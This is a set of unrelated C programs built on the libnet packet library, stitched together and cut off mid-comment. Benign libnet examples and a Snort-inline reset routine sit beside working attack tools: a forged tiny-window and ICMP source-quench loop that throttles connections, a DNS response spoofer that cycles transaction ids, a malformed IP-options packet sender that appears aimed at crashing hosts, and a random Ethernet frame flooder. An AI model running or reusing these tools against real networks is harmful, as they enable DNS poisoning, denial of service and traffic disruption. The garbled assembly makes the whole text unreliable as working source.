struct libnet_tcp_hdr *tcp;
struct libnet_icmp_hdr *icmp;
u_char *pkt, buf[IP_H + ICMP_ECHO_H + 128];
int len, nice;
libnet_seed_prand();
nice = 160 / Opt_nice;
for (;;) {
if ((pkt = (char *)pcap_next(pd, &pkthdr)) != NULL) {
ip = (struct libnet_ip_hdr *)(pkt + pcap_off);
if (ip->ip_p != IPPROTO_TCP) continue;
tcp = (struct libnet_tcp_hdr *)
((u_char *)ip + (ip->ip_hl * 4));
if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST) ||
ntohs(tcp->th_win) == nice)
continue;
if (Opt_icmp) {
/* Send ICMP source quench. */
len = (ip->ip_hl * 4) + 8;
libnet_build_ip(ICMP_ECHO_H + len, 0,
libnet_get_prand(PRu16),
0, 64, IPPROTO_ICMP,
ip->ip_dst.s_addr,
ip->ip_src.s_addr,
NULL, 0, buf);
icmp = (struct libnet_icmp_hdr *)(buf + IP_H);
icmp->icmp_type = 4;
icmp->icmp_code = 0;
memcpy((u_char *)icmp + ICMP_ECHO_H,
(u_char *)ip, len);
libnet_do_checksum(buf, IPPROTO_ICMP,
ICMP_ECHO_H + len);
len += (IP_H + ICMP_ECHO_H);
if (libnet_write_ip(sock, buf, len) != len)
warn("write");
fprintf(stderr, "%s > %s: icmp: source quench\n",
libnet_host_lookup(ip->ip_dst.s_addr, 0),
libnet_host_lookup(ip->ip_src.s_addr, 0));
}
/* Send tiny window advertisement. */
ip->ip_hl = 5;
ip->ip_len = htons(IP_H + TCP_H);
ip->ip_id = libnet_get_prand(PRu16);
memcpy(buf, (u_char *)ip, IP_H);
tcp->th_off = 5;
tcp->th_win = htons(nice);
memcpy(buf + IP_H, (u_char *)tcp, TCP_H);
libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
len = IP_H + TCP_H;
if (libnet_write_ip(sock, buf, len) != len)
warn("write");
fprintf(stderr, "%s:%d > %s:%d: . ack %u win %d\n",
libnet_host_lookup(ip->ip_src.s_addr, 0),
ntohs(tcp->th_sport),
libnet_host_lookup(ip->ip_dst.s_addr, 0),
ntohs(tcp->th_dport),
ntohl(tcp->th_ack), nice);
}
}
}
int
main(int argc, char **argv)
{
int sock, c;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char *cp, *buf;
printf("TCP packet building/writing test\n");
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
while((c = getopt(argc, argv, "d:s:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Get our block of memory for the packet. In this case, we only need
* memory for the packet headers.
*/
buf = malloc(IP_MAXPACKET);
if (!buf)
{
perror("No memory for packet header");
exit(EXIT_FAILURE);
}
/*
* Open our raw IP socket and set IP_HDRINCL.
*/
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("No socket");
exit(EXIT_FAILURE);
}
/*
* Build the IP header (shown exploded for commenting).
*/
libnet_build_ip(LIBNET_TCP_H, /* Size of the payload */
IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */
242, /* IP ID */
0, /* Frag stuff */
48, /* TTL */
IPPROTO_TCP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
buf); /* Packet header memory */
/*
* Build the TCP header.
*/
libnet_build_tcp(src_prt, /* Source TCP port */
dst_prt, /* Destination TCP port */
11111, /* Sequence number */
99999, /* Acknowledgement number */
TH_SYN, /* Control flags */
1024, /* Window size */
0, /* Urgent pointer */
NULL, /* Pointer to payload (none) */
0,
buf + LIBNET_IP_H); /* Packet header memory */
/*
* Calculate the TCP header checksum (IP header checksum is *always* done
* by the kernel.
*/
libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H);
/*
* Write the packet to the network.
*/
c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H);
if (c < LIBNET_TCP_H + LIBNET_IP_H)
{
fprintf(stderr, "libnet_write_ip\n");
}
printf("Completed, wrote %d bytes\n", c);
free(buf);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int main (int argc, char **argv) {
u_long src_ip, /* source address */
dst_ip; /* destination address */
u_short src_port, /* source port */
dst_port, /* destination port */
id; /* dns id we are spoofing */
int i, /* loop counter */
written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
payload_size, /* size of our payload */
npackets, /* num of packet to write */
socket; /* socket to write on */
u_char *packet, /* we build this */
*payload; /* we send this */
if (argc < 7) {
printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n");
exit (EXIT_FAILURE);
}
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
src_ip = libnet_name_resolve(argv[1], 0);
dst_ip = libnet_name_resolve(argv[3], 0);
src_port = (u_short) atoi(argv[2]);
dst_port = (u_short) atoi(argv[4]);
id = (u_short) atoi(argv[5]);
npackets = (int) atoi(argv[6]);
payload = /* question section name/types, size: 21 */
"\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
/* answer section, names/types, size: 21 */
"\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
/* answer section, ttl, size: 4 */
"\xff\xff\xff\xff"
/* answer section, rdata length, size: 2 */
"\x00\x04"
/* answer section, rdata, size: 4 */
"\x81\x51\xe0\x43";
payload_size = 52;
/*
* packet memory allocation
*/
packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
/*
* ip header construction
*/
libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
10951, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
src_ip, /* source address */
dst_ip, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* it really shouldn't be here though
*/
libnet_build_udp(src_port, /* source port */
dst_port, /* destination port */
NULL, /* payload */
payload_size + 12, /* payload length */
packet + LIBNET_IP_H);
/*
* write npackets
* we loop from here because we must change the dns id and also re-checksum
*/
printf("\nwriting packets");
for (i = 0; i < npackets; i++) {
printf(".");
/*
* dns header construction
*/
libnet_build_dns(id+i, /* dns id */
0x8180, /* control flags */
1, /* number of questions */
1, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size)
libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
}
/*
* cleanup
*/
libnet_destroy_packet(&packet);
if (libnet_close_raw_sock(socket) == -1)
libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
printf("\n");
return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int main(int argc, char **argv)
{
u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0;
u_long *problem = NULL;
u_char *packet = NULL;
int sock, c, len = 0;
long acx, count = 1;
struct icmp *icmp;
struct ip *ip;
/* It appears that most IP options of length >0 will work
* Works with 128, 64, 32, 16... And the normal ones 137...
* Does not work with 0, 1 */
u_char data[] = {137};
int data_len = sizeof(data);
printf("Written by Mike Frantzen... <*****@*****.**>\n");
printf("For test purposes only... yada yada yada...\n");
src_ip = inet_addr("10.10.10.10");
while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
switch(c) {
case 'd': dst_ip = libnet_name_resolve(optarg, 1);
break;
case 's': src_ip = libnet_name_resolve(optarg, 1);
break;
case 'D': ins_dst_ip = name_resolve(optarg, 1);
break;
case 'S': ins_src_ip = name_resolve(optarg, 1);
break;
case 'l': data_len = atoi(optarg);
break;
case 'c': if ( (count = atol(optarg)) < 1)
count = 1;
break;
default: printf("Don't understand option.\n");
exit(-1);
}
}
if ( dst_ip == 0 ) {
printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n",
rindex(argv[0], '/') == NULL ? argv[0]
: rindex(argv[0], '/') + 1);
printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n");
printf("\t\t[-l <data length>]\t[-c <# to send>]\n");
exit(-1);
}
if ( ins_dst_ip == 0 )
ins_dst_ip = src_ip;
if ( ins_src_ip == 0 )
ins_src_ip = dst_ip;
if ( (packet = malloc(1500)) == NULL ) {
perror("malloc: ");
exit(-1);
}
if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) {
perror("socket: ");
exit(-1);
}
/* 8 is the length of the ICMP header with the problem field */
len = 8 + IP_H + data_len;
bzero(packet + IP_H, len);
libnet_build_ip(len, /* Size of the payload */
0xc2, /* IP tos */
30241, /* IP ID */
0, /* Frag Offset & Flags */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload */
0,
packet); /* Packet memory */
/* ICMP Header for Parameter Problem
* --------------+---------------+---------------+---------------
*| Type (12) | Code (0) | Checksum |
* --------------+---------------+---------------+---------------
*| Pointer | unused |
* --------------+---------------+---------------+---------------
* Internet Header + 64 bits of original datagram data....
*/
icmp = (struct icmp *) (packet + IP_H);
problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */
icmp->icmp_type = ICMP_PARAMPROB;
icmp->icmp_code = 0; /* Indicates a problem pointer */
*problem = htonl(0x14000000); /* Problem is 20 bytes into it */
/* Need to embed an IP packet within the ICMP */
ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */
ip->ip_v = 0x4; /* IPV4 */
ip->ip_hl = 0xf; /* Some IP Options */
ip->ip_tos = 0xa3; /* Whatever */
ip->ip_len = htons(data_len); /* Length of packet */
ip->ip_id = 30241; /* Whatever */
ip->ip_off = 0; /* No frag's */
ip->ip_ttl = 32; /* Whatever */
ip->ip_p = 98; /* Random protocol */
ip->ip_sum = 0; /* Will calc later */
ip->ip_src.s_addr = ins_src_ip;
ip->ip_dst.s_addr = ins_dst_ip;
/* Move our data block into the packet */
bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len);
/* I hate checksuming. Spent a day trying to get it to work in
* perl... That sucked... Tequilla would have helped immensly.
*/
libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len);
/* Bah... See above comment.... */
libnet_do_checksum(packet, IPPROTO_ICMP, len);
printf("Sending %li packets", count);
for (acx = 0; acx < count; acx++) {
if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H))
perror("write_ip: ");
else printf(".");
}
printf("\n\n");
return( 0 );
}
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
char *device = NULL;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct tcphdr *TCP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 4) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) {
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved source address\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved destination address\n");
exit(-1);
}
if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {
perror("malloc");
exit(-1);
}
buf[20] = atoi(argv[3]);
buf[21] = 39; // our malformed size
for (c = 0; c<38; c+=3)
strncpy(&buf[22+c], "ECL", 3); // padding
TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX);
TCP->th_off = 5;
packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2);
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_TCP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
TCP->th_sport = htons(1337);
TCP->th_dport = htons(80);
TCP->th_seq = 0;
TCP->th_ack = 0;
TCP->th_x2 = 0;
TCP->th_flags = TH_SYN;
TCP->th_win = rand() & 0xffff;
TCP->th_sum = 0;
TCP->th_urp = 0;
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
int main(int argc, char **argv)
{
u_char compare[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_char dhost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_char shost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
struct ether_header *ether = NULL;
u_int16_t proto = htons(ETHERTYPE_IP);
struct ether_addr *ea = NULL;
u_int16_t *data = NULL;
char dev[128] = "";
u_char *buf = NULL;
int proto_rand = 0;
struct timeval tv, tv2;
int max_len = ETHER_FRAME_SIZE;
u_long count = 0xffffffffl;
u_long data_pushed = 0;
struct ip *ip = NULL;
u_long data_len = 0;
int rand_source = 0;
int rand_dest = 0;
long mark = 1000;
u_long skip = 0; /* Skip how many packets */
u_long acx = 0;
int debug = 0;
u_int len = 0;
u_int cx = 0;
float sec;
int seed;
u_int c;
/* libnet variables */
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
seed = getpid();
while((c=getopt(argc, argv, "hi:s:d:k:p:r:c:l:Dvm:")) != (unsigned) EOF) {
switch (c) {
case 'i':
if (rindex(optarg, '/'))
strncpy(dev, (char *) rindex(optarg, '/')+1, 128);
else
strncpy(dev, optarg, 128);
dev[127] = '\0';
break;
case 's':
if ( strcmp(optarg, "rand") == 0 ) {
printf("Using random source MAC's\n");
shost[0] = 0xff;
rand_source = 1;
break;
}
bcopy(atoether(optarg), shost, 6);
break;
case 'd':
if ( strcmp(optarg, "rand") == 0 ) {
printf("Using random destination MAC's\n");
dhost[0] = 0xff;
rand_dest = 1;
break;
}
bcopy(atoether(optarg), dhost, 6);
break;
case 'r':
seed = atoi(optarg);
break;
case 'c':
count = atol(optarg);
break;
case 'm':
mark = atol(optarg);
if (mark <= 0)
exit(printf("Please use a positive arg for -m\n"));
break;
case 'k':
skip = atol(optarg);
printf("Will not transmit first %li packet(s).\n", skip);
break;
case 'D':
debug++;
break;
case 'l':
max_len = atoi(optarg);
if ( max_len > 1500 ) {
printf("Maximum Length of %i is longer than the max "
"ethernet frame size of %i\n", max_len,
ETHER_FRAME_SIZE);
exit(0);
}
if ( max_len < 14) {
printf("You seam to have entered %i as the maximum "
"length... Please make it >= 14\n", max_len);
exit(0);
}
break;
case 'p':
if ( strcasecmp(optarg, "rand") == 0 ) {
proto_rand++;
break;
}
proto_rand = 0;
proto = htons(atoi(optarg));
break;
case 'v':
printf("Version %s\n", VERSION);
exit(0);
case 'h':
default:
usage(argv[0]);
exit( 0 );
}
}
if ( *dev == '\0' ) {
usage(argv[0]);
exit( 0 );
}
/* Initialize libnet context, Root priviledges are required.*/
l = libnet_init(
LIBNET_LINK_ADV, /* injection type */
dev, /* network interface */
errbuf); /* error buffer */
if (l == NULL) {
fprintf(stderr, "Can not initialize libnet: %s", errbuf);
exit( -1 );
}
max_len -= 6 + 6 + 2;
printf("Seeding with %i\n", seed);
srand(seed);
if ( (buf = malloc(ETHER_FRAME_SIZE)) == NULL ) {
perror("malloc");
exit( -1 );
}
bzero(buf, ETHER_FRAME_SIZE);
ether = (struct ether_header *) buf;
if ( bcmp(dhost, compare, 6) == 0 )
memset(ether->ether_dhost, 0xff, 6);
else bcopy(dhost, ether->ether_dhost, 6);
if ( bcmp(shost, compare, 6) == 0 ) {
if ( (ea = (struct ether_addr *)libnet_get_hwaddr(l)) == 0 )
fprintf(stderr, "Cannot get MAC for %s: %s", dev, libnet_geterror(l));
bcopy(ea, ether->ether_shost, 6);
} else bcopy(shost, ether->ether_shost, 6);
printf("Maximum packet size (minus header) is %i bytes\n", max_len);
if ( proto_rand )
printf("Ethernet protocols will be randomized.\n");
else printf("Ethernet protocol will be %i.\n", ntohs(proto));
if ( !rand_dest )
printf("Sending to MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
ether->ether_dhost[0], ether->ether_dhost[1],
ether->ether_dhost[2], ether->ether_dhost[3],
ether->ether_dhost[4], ether->ether_dhost[5]);
else printf("Sending to random MAC addresses.\n");
if ( !rand_source )
printf("Sending from MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
ether->ether_shost[0], ether->ether_shost[1],
ether->ether_shost[2], ether->ether_shost[3],
ether->ether_shost[4], ether->ether_shost[5]);
else printf("Sending from random MAC addresses.\n");
ip = (struct ip *) (buf + 14);
data = (u_int16_t *) (buf + 14);
printf("Sending...\n");
gettimeofday(&tv, NULL);
for ( acx = 1; acx <= count; acx++ ) {
len = sizeof(struct ether_header);
if ( rand_source ) {
((u_int16_t *) ether->ether_shost)[0] = RAND16;
((u_int16_t *) ether->ether_shost)[1] = RAND16;
((u_int16_t *) ether->ether_shost)[2] = RAND16;
}
if ( rand_dest ) {
((u_int16_t *) ether->ether_dhost)[0] = RAND16;
((u_int16_t *) ether->ether_dhost)[1] = RAND16;
((u_int16_t *) ether->ether_dhost)[2] = RAND16;
}
if ( proto_rand )
ether->ether_type = RAND16;
else ether->ether_type = proto;
data_len = (u_int) (max_len * (rand()/((float) RAND_MAX + 1)));
data_len >>= 1;
for ( cx = 0; cx < data_len; cx++ )
data[cx] = RAND16;
data_len <<= 1;
if ( rand() & 0x1 ) {
data_len++;
data[cx] = RAND16;
}
len += data_len;
ip->ip_len = htons(data_len);
ip->ip_sum = 0;
libnet_do_checksum(l, (u_int8_t *) ip, IPPROTO_IP, data_len);
if ( debug ) {
printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x -> ",
ether->ether_shost[0], ether->ether_shost[1],
ether->ether_shost[2], ether->ether_shost[3],
ether->ether_shost[4], ether->ether_shost[5]);
printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\t",
ether->ether_dhost[0], ether->ether_dhost[1],
ether->ether_dhost[2], ether->ether_dhost[3],
ether->ether_dhost[4], ether->ether_dhost[5]);
switch( ntohs(ether->ether_type) ) {
case ETHERTYPE_IP:
printf("Proto IP \t");
break;
case ETHERTYPE_ARP:
printf("Proto ARP \t");
break;
case ETHERTYPE_PUP:
printf("Proto PUP \t");
break;
case ETHERTYPE_REVARP:
printf("Proto RARP\t");
break;
case ETHERTYPE_VLAN:
printf("Proto VLAN\t");
break;
default:
printf("Proto %u\t",
ntohs(ether->ether_type));
}
printf("Length %i\n", len);
}
if ( acx >= skip ) {
c = libnet_adv_write_link(l, buf, len);
if (c !=(u_int) -1)
data_pushed += c;
}
/* if ( c != len )
* perror("write_ll");
*/
if ( !(acx % mark) ) {
gettimeofday(&tv2, NULL);
sec = (tv2.tv_sec - tv.tv_sec)
- (tv.tv_usec - tv2.tv_usec) / 1000000.0;
printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx,
mark/sec, (data_pushed/1024.0)/sec );
data_pushed = 0;
gettimeofday(&tv, NULL);
}
}
if ((acx-1) % mark) { /* There is a remainder */
gettimeofday(&tv2, NULL);
sec = (tv2.tv_sec - tv.tv_sec)
- (tv.tv_usec - tv2.tv_usec) / 1000000.0;
printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx-1,
((acx-1) % mark)/sec, (data_pushed/1024.0)/sec );
}
libnet_destroy(l);
free( buf );
return ( 0 );
}
static void
RejectLayer2(ipq_packet_msg_t *m)
{
IPHdr *iph;
TCPHdr *tcph;
ICMPHdr *icmph;
EtherHdr *eh;
int proto;
int size = 0;
int payload_len = 0;
/* pointer to the device to use: according to the libnet manpage
* this should be u_char, but I get a compiler warning then.
* Making it a char fixes that. VJ. */
char *device = NULL;
/* to get the mac address of the interface when in layer2 mode */
struct ether_addr *link_addr;
u_char enet_dst[6]; /* mac addr for creating the ethernet packet. */
u_char enet_src[6]; /* mac addr for creating the ethernet packet. */
struct libnet_link_int *network = NULL; /* pointer to link interface struct */
int i = 0;
iph = (IPHdr *)(l_tcp + ETH_H);
proto = tmpP->iph->ip_proto;
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
/* set the interface. For Nat/Ip-mode the device we use to send a reset to the offender
* is the device on which the packet entered. For bridge-mode indev and outdev are always
* equal, so we use indev as well. There is one rare exception to this... if on the Snort_
* inline box a client is run that causes a reset, indev is not set but outdev. */
if(m->indev_name[0] != '\0')
device = m->indev_name;
else
device = m->outdev_name;
/* Let's initialize Libnet */
if((network = libnet_open_link_interface(device, errbuf)) == NULL)
{
libnet_error(LIBNET_ERR_FATAL,
"libnet_open_link_interface for device %s failed: %s\n",
device, errbuf);
return;
}
/* lets get the mac addr of the interface */
if(!(link_addr = libnet_get_hwaddr(network, device, errbuf)))
{
libnet_error(LIBNET_ERR_FATAL,
"libnet_get_hwaddr failed: %s\n",
errbuf);
return;
}
/* copy the mac: the src is set the the interface mac
* but only if the mac wasn't supplied in the configfile */
if(pv.enet_src[0] == 0 && pv.enet_src[1] == 0 && pv.enet_src[2] == 0 && pv.enet_src[3] == 0 && pv.enet_src[4] == 0 && pv.enet_src[5] == 0)
{
/* either user set mac as 00:00:00:00:00:00 or it is blank */
for(i = 0; i < 6; i++)
enet_src[i] = link_addr->ether_addr_octet[i];
}
else
{
for(i = 0; i < 6; i++)
enet_src[i] = pv.enet_src[i];
}
/* copy the mac: the old src now becomes dst */
for(i = 0; i < 6; i++)
enet_dst[i] = m->hw_addr[i];
//printf("reset src mac: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0],enet_src[1],enet_src[2],enet_src[3],enet_src[4],enet_src[5]);
//printf("reset dst mac: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0],enet_dst[1],enet_dst[2],enet_dst[3],enet_dst[4],enet_dst[5]);
switch(proto)
{
case IPPROTO_TCP:
if (!tmpP->frag_flag)
{
size = ETH_H + IP_H + TCP_H;
eh = (EtherHdr *)l_tcp;
iph = (IPHdr *)(l_tcp + ETH_H);
tcph = (TCPHdr *)(l_tcp + ETH_H + IP_H);
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
tcph->th_sport = tmpP->tcph->th_dport;
tcph->th_dport = tmpP->tcph->th_sport;
tcph->th_seq = tmpP->tcph->th_ack;
tcph->th_ack = htonl(ntohl(tmpP->tcph->th_seq) + 1);
//printf("Send TCP Rst in Bridge-mode.\n");
/* calculate the checksums */
if (libnet_do_checksum(l_tcp + ETH_H, IPPROTO_TCP, TCP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthTCPRST: libnet_do_checksum failed for TCP_H");
return;
}
if (libnet_do_checksum(l_tcp + ETH_H, IPPROTO_IP, IP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthTCPRST: libnet_do_checksum failed for IP_H");
return;
}
/* build the ethernet packet */
if (libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, l_tcp) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthTCPRST: libnet_build_ethernet");
return;
}
/* finally write it to the link */
if(libnet_write_link_layer(network, device, l_tcp, size) < size)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthTCPRST: libnet_write_link_layer");
return;
}
} /* end if !tmpP->frag_flag */
break;
case IPPROTO_UDP:
if (!tmpP->frag_flag)
{
eh = (EtherHdr *)l_icmp;
iph = (IPHdr *)(l_icmp + ETH_H);
icmph = (ICMPHdr *) (l_icmp + ETH_H + IP_H);
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
if ((payload_len = ntohs(tmpP->iph->ip_len) -
(IP_HLEN(tmpP->iph) << 2)) > 8)
{
payload_len = 8;
}
memcpy((char *)icmph + ICMP_UNREACH_H, tmpP->iph,
(IP_HLEN(tmpP->iph) << 2) + payload_len);
size = ETH_H + IP_H + ICMP_UNREACH_H +
(IP_HLEN(tmpP->iph) << 2) + payload_len;
iph->ip_len = htons(size);
/* calculate the checksums */
if (libnet_do_checksum(l_icmp + ETH_H, IPPROTO_ICMP, size - IP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthICMPRST: libnet_do_checksum failed for IPPROTO_ICMP");
return;
}
if (libnet_do_checksum(l_icmp + ETH_H, IPPROTO_IP, IP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthICMPRST: libnet_do_checksum failed for IPPROTO_IP");
return;
}
/* build the ethernet packet */
if (libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, l_icmp) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthICMPRST: libnet_build_ethernet");
return;
}
/* finally write it to the link */
//printf("Send ICMP Rst in Bridge-mode.\n");
if(libnet_write_link_layer(network, device, l_icmp, size) < size)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthICMPRST: libnet_write_link_layer");
return;
}
}
break;
} /* end switch(proto) */
/* clean up file-descriptors for the next time we call RejectLayer2 */
if((libnet_close_link_interface(network)) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"libnet_close_link_interface error\n");
}
}
int
main(int argc, char *argv[])
{
int packet_size, /* size of our packet */
payload_size, /* size of our packet */
c; /* misc */
u_long src_ip, dst_ip; /* source ip, dest ip */
u_short bport, eport; /* beginning and end ports */
u_short cport; /* current port */
u_char payload[MAX_PAYLOAD_SIZE]; /* packet payload */
u_char *packet; /* pointer to our packet buffer */
char err_buf[LIBNET_ERRBUF_SIZE]; /* error buffer */
u_char *device; /* pointer to the device to use */
struct libnet_link_int *network; /* pointer to link interface struct */
struct libnet_plist_chain plist; /* plist chain */
struct libnet_plist_chain *plist_p; /* plist chain pointer */
printf("libnet example code:\tmodule 4\n\n");
printf("packet injection interface:\tlink layer\n");
printf("packet type:\t\t\tUDP [with payload] using port list chaining\n");
plist_p = NULL;
device = NULL;
src_ip = 0;
dst_ip = 0;
while ((c = getopt(argc, argv, "i:d:s:p:")) != EOF)
{
switch (c)
{
case 'd':
if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
{
libnet_error(LIBNET_ERR_FATAL,
"Bad destination IP address: %s\n", optarg);
}
break;
case 'i':
device = optarg;
break;
case 's':
if (!(src_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
{
libnet_error(LIBNET_ERR_FATAL,
"Bad source IP address: %s\n", optarg);
}
break;
case 'p':
plist_p = &plist;
if (libnet_plist_chain_new(&plist_p, optarg) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "Could not build port list\n");
}
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip || !plist_p)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
c = argc - optind;
if (c != 1)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
memset(payload, 0, sizeof(payload));
strncpy(payload, argv[optind], strlen(argv[optind]));
/*
* Step 1: Network Initialization (interchangable with step 2).
*/
if (device == NULL)
{
struct sockaddr_in sin;
/*
* Try to locate a device.
*/
if (libnet_select_device(&sin, &device, err_buf) == -1)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", err_buf);
}
printf("device:\t\t\t\t%s\n", device);
}
if ((network = libnet_open_link_interface(device, err_buf)) == NULL)
{
libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", err_buf);
}
/*
* Get the payload from the user. Hrm. This might fail on a Sparc
* if byte alignment is off...
*/
payload_size = strlen(payload);
/*
* We're going to build a UDP packet with a payload using the
